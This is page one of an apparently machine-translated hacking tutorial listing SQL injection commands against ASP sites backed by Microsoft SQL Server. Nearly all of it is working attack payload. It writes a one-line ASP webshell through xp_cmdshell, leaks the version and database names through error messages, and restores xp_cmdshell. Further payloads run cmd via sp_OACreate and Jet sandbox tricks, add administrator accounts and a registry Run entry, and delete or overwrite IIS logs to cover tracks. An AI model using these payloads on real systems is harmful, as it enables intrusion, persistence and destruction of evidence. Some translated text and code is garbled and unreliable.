ASP Injection Detail Command 40 article 1/2 page _ Application Tips

1, with ^ escape characters to write ASP (a word Trojan) file method:
Http://192.168.1.5/display.asp?keyno=1881;exec Master.dbo.xp_cmdshell ' echo ^<script language=vbscript runat= Server^>execute request^ ("L" ^) ^</script^> >c:\mu.asp ';--

Echo ^<%execute^ (request^ ("L" ^) ^)%^> >c:\mu.asp

2. Display SQL System version:
? http://192.168.1.5/display.asp?keyno=188 and 1= (SELECT @ @VERSION)
? Http://www.XXXX.com/FullStory.asp?id=1 and 1=convert (int,@ @version)--

Microsoft VBScript Compiler error ' 800A03F6 '
Missing ' End '
/iishelp/common/500-100.asp, Line 242
Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value ' Microsoft SQL Server 2000-8.00.760 (Intel X86) Dec 2002 14:22:05 Copyrigh T (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (builds 2195:service Pack 4) ' to a column of data Type int.
/display.asp, line 17
3, in the detection of Sony China's Web site vulnerabilities, clearly have identified the vulnerability exists but can not find the corresponding type in these three vulnerabilities. By chance, I thought of it. You can use the "in" keyword in the SQL language to query, for example, "select * from MyTable where ID in (1)", the value in parentheses is the data we submit, and its result is the use of the "select * FROM MyTable The query result for where id=1 is exactly the same. So when you visit the page, the original SQL statement after the URL followed by "1=1 and 1 in (1") becomes "select * from MyTable where ID in (1) and 1=1 and 1 in (1)", which will result in a long-awaited Page. This type of vulnerability for the moment is "include digital" bar, smart you must have thought of and "include character type". By the way, it is caused by a query statement similar to "SELECT * from MyTable where name" (' Firstsee ').

4, to determine whether the xp_cmdshell extended stored procedures exist:
http://192.168.1.5/display.asp?keyno=188 and 1= (select COUNT (*) from master.dbo.sysobjects where xtype = ' x ' and name = ' x ' P_cmdshell ')
To restore a command for xp_cmdshell extended storage:
http://www.test.com/news/show1.asp?NewsId=125272
; exec master.dbo.sp_addextendedproc ' xp_cmdshell ', ' E:\inetput\web\xplog70.dll ';--

5. Write the command line and execute program to the Startup group:
http://192.168.1.5/display.asp?keyno=188; EXEC master.dbo.xp_regwrite ' HKEY_LOCAL_MACHINE ', ' SOFTWARE\Microsoft\Windows\CurrentVersion\Run ', ' help1 ', ' reg_ SZ ', ' cmd.exe/c net user test Ptlove/add '


6, view the current database name:
? http://192.168.1.5/display.asp?keyno=188 and 0<>db_name (n) n changed to 0,1,2,3 ... We can cross the library.
? Http://www.XXXX.com/FullStory.asp?id=1 and 1=convert (Int,db_name ())--
Microsoft VBScript Compiler error ' 800A03F6 '
Missing ' End '
/iishelp/common/500-100.asp, Line 242
Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value ' huidahouse ' to a column of data type int.
/display.asp, line 17
7, list all the current database names:
SELECT * from master.dbo.sysdatabases lists records for all columns
Select name from master.dbo.sysdatabases only lists records for the name column

8, do not need xp_cmdshell support in the injection of the vulnerability of SQL Server run cmd command:
Create TABLE mytmp (Info VARCHAR), ID int IDENTITY (1,1) not NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR (400)
EXEC sp_OACreate ' Wscript.Shell ', @shell output
EXEC sp_OAMethod @shell, ' run ', null, ' cmd.exe/c dir c:\>c:\temp.txt ', ' 0 ', ' true '
--note that the run argument true refers to the result that will wait for the program to run, and this parameter is required for long time commands like Ping.

EXEC sp_OACreate ' scripting.filesystemobject ', @fso output
EXEC sp_OAMethod @fso, ' OpenTextFile ', @file out, ' c:\temp.txt '
--Because the FSO's OpenTextFile method will return a TextStream object, @file is an object token at this time

While @shell >0
BEGIN
EXEC sp_OAMethod @file, ' Readline ', @out out
INSERT into mytmp (info) VALUES (@out)
EXEC sp_oagetproperty @file, ' AtEndOfStream ', @isEnd out
IF @isEnd =1 Break
ELSE CONTINUE
End

Drop TABLE mytmp

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR (400)
EXEC sp_OACreate ' Wscript.Shell ', @shell output
EXEC sp_OAMethod @shell, ' run ', null, ' cmd.exe/c cscript C:\Inetpub\AdminScripts\adsutil.vbs set/w3svc/ InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv \httpodbc.dll "" C:\WINNT\system32\inetsrv\ssinc.dll "" C:\WINNT\system32\msw3prt.dll "" C:\winnt\system32\inetsrv\ Asp.dll ">c:\temp.txt ', ' 0 ', ' true '
EXEC sp_OACreate ' scripting.filesystemobject ', @fso output
EXEC sp_OAMethod @fso, ' OpenTextFile ', @file out, ' c:\temp.txt '
While @shell >0
BEGIN
EXEC sp_OAMethod @file, ' Readline ', @out out
INSERT into mytmp (info) VALUES (@out)
EXEC sp_oagetproperty @file, ' AtEndOfStream ', @isEnd out
IF @isEnd =1 Break
ELSE CONTINUE
End

The following is a line that adds a Web user to the Administrators group:
declare  @shell  INT DECLARE  @fso  INT DECLARE  @file  int declare   @isEnd  BIT DECLARE  @out  varchar ()  EXEC sp_oacreate  ' Wscript.Shell ' , @shell  output EXEC sp_oamethod  @shell, ' run ', NULL, ' Cmd.exe /c cscript c:\ inetpub\adminscripts\adsutil.vbs set /w3svc/inprocessisapiapps  "C:\WINNT\system32\idq.dll"   "C:\WINNT\system32\inetsrv\httpext.dll"   "C:\WINNT\system32\inetsrv\httpodbc.dll"   C:\WINNT\ System32\inetsrv\ssinc.dll " " C:\WINNT\system32\msw3prt.dll " " C:\winnt\system32\inetsrv\asp.dll ">c : \temp.txt ', ' 0 ', ' true '  EXEC sp_oacreate  ' Scripting.FileSystemObject ', @fso  output exec  sp_oamethod  @fso, ' OpenTextFile ', @file  out, ' c:\temp.txt '  WHILE  @shell >0 begin  EXEC sp_oamethod  @file, ' Readline ', @out  out insert into mytmp (info)   values  (@out)  exec sp_oagetproperty  @file, ' AtEndOfStream ', @isEnd  out IF  @isEnd =1 break else  CONTINUE END 

The following is an EXE program executing in a row:
DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd BIT DECLARE @out VARCHAR () EXEC sp_OACreate ' Wscri Pt.shell ', @shell output EXEC sp_OAMethod @shell, ' run ', null, ' cmd.exe/c cscript.exe E:\bjeea.net.cn\score\fts\images\ Iis.vbs lh1 c:\>c:\temp.txt ', ' 0 ', ' true ' exec sp_oacreate ' scripting.filesystemobject ', @fso output exec sp_OAMethod @ FSO, ' OpenTextFile ', @file out, ' c:\temp.txt ' while @shell >0 the BEGIN EXEC sp_oamethod @file, ' Readline ', @out out insert into mytmp (info) VALUES (@out) The EXEC sp_oagetproperty @file, ' AtEndOfStream ', @isEnd out IF @isEnd =1 break ELSE CONTINUE End

SQL under three ways to execute the cmd command:

Delete Log No. 7.18 first:
(1) Exec Master.dbo.xp_cmdshell ' del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt '

(2) DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd BIT DECLARE @out VARCHAR () EXEC sp_OACreate ' Wscri Pt.shell ', @shell output EXEC sp_OAMethod @shell, ' run ', null, ' Cmd.exe/c del C:\winnt\system32\logfiles\W3SVC5\ Ex050718.log >c:\temp.txt ', ' 0 ', ' true ' exec sp_oacreate ' scripting.filesystemobject ', @fso output exec sp_OAMethod @ FSO, ' OpenTextFile ', @file out, ' c:\temp.txt ' while @shell >0 the BEGIN EXEC sp_oamethod @file, ' Readline ', @out out insert into mytmp (info) VALUES (@out) The EXEC sp_oagetproperty @file, ' AtEndOfStream ', @isEnd out IF @isEnd =1 break ELSE CONTINUE End

(3) First open the Jet sandbox mode, through the extended stored procedures Xp_regwrite Modify the registry implementation, the administrator to modify the registry can not prevent the reasons. For security reasons, the default sandbox mode is not turned on, which is why you need to xp_regwrite, and xp_regwrite at least db_owner permissions, and for convenience, it is recommended that you use the sysadmin permission test:
? EXEC master.. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1
Note:
0 prohibition Everything (default)
1 makes access accessible, but prohibits other
2 disables access, but enables other
3 Enable everything

? Only commands used under sysadmin permissions are given here:
SELECT * FROM OPENROWSET (' microsoft.jet.oledb.4.0 ', ';d atabase=c:\winnt\system32\ias\ias.mdb ', ' Select Shell ' (" cmd.exe/c net user admin Admin1234/add ")"


? Establish a linked database ' l0op8ack ' reference command:
EXEC sp_addlinkedserver ' l0op8ack ', ' OLE DB Provider for Jet ', ' microsoft.jet.oledb.4.0 ', ' c:\windows\system32\ias\ Ias.mdb '

? How to use a linked database:

This can be done in this way, but unfortunately, db_owner permissions are not sufficient and require at least sysadmin permissions or securityadmin+setupadmin permission combinations
sp_addlinkedserver requires sysadmin or setupadmin permissions
sp_addlinkedsrvlogin requires sysadmin or securityadmin permissions
The final discovery is that the SA or Setupadmin+securityadmin permission account will be used.
There is generally no administrator that sets the normal account permissions

Practicality is not strong, only as a learning summary bar

The approximate process is as follows, if it is not sysadmin, then the Ias.mdb permission validation will be wrong,
I tested the time to grant hacker this user setupadmin+securityadmin permission to use Ias.mdb failed
You need to find an MDB accessible to a typical user to:

? New Linked server "L0op8ack": EXEC sp_addlinkedserver ' l0op8ack ', ' jetoledb ', ' microsoft.jet.oledb.4.0 ', ' C:\winnt\system32\ias \ias.mdb ';--
? exec sp_addlinkedsrvlogin ' L0op8ack ', ' false ';--or
exec sp_addlinkedsrvlogin ' L0op8ack ', ' false ', NULL, ' test1 ', ' ptlove ';
? SELECT * from OPENQUERY (l0op8ack, ' select Shell (cmd.exe/c net user) ');--
? exec sp_droplinkedsrvlogin ' L0op8ack ', ' false ';--
? exec sp_dropserver ' l0op8ack ';--

Another beta file to replace the 7.18-day file:
(1) Exec master.dbo.xp_cmdshell ' copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\ W3svc5\ex050718.log>c:\temp.txt '

(2) DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd BIT DECLARE @out VARCHAR () EXEC sp_OACreate ' Wscri Pt.shell ', @shell output EXEC sp_OAMethod @shell, ' run ', null, ' cmd.exe/c copy C:\winnt\system32\logfiles\W3SVC5\ Ex050716.log c:\winnt\system32\logfiles\w3svc5\ex050718.log>c:\temp.txt ', ' 0 ', ' true ' EXEC sp_OACreate ' Scripting.FileSystemObject ', @fso output EXEC sp_OAMethod @fso, ' OpenTextFile ', @file out, ' c:\temp.txt ' while @shell > 0 BEGIN exec sp_OAMethod @file, ' Readline ', @out out inserts into Mytmp (info) VALUES (@out) exec sp_oagetproperty @file, ' Aten Dofstream ', @isEnd out IF @isEnd =1 break ELSE CONTINUE End

(3) DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd BIT DECLARE @out VARCHAR () EXEC sp_OACreate ' Wscri Pt.shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' cmd.exe/c net user>c:\temp.txt ', ' 0 ', ' true ' exec sp_ Oacreate ' Scripting.FileSystemObject ', @fso output EXEC sp_OAMethod @fso, ' OpenTextFile ', @file out, ' c:\temp.txt ' while @ shell>0 BEGIN exec sp_OAMethod @file, ' Readline ', UT out inserts into MYTMP (info) VALUES (@out) EXEC sp_OAGetProperty @fi Le, ' AtEndOfStream ', @isEnd out IF @isEnd =1 break ELSE CONTINUE End

Current 1/2 page 12 Next read the full text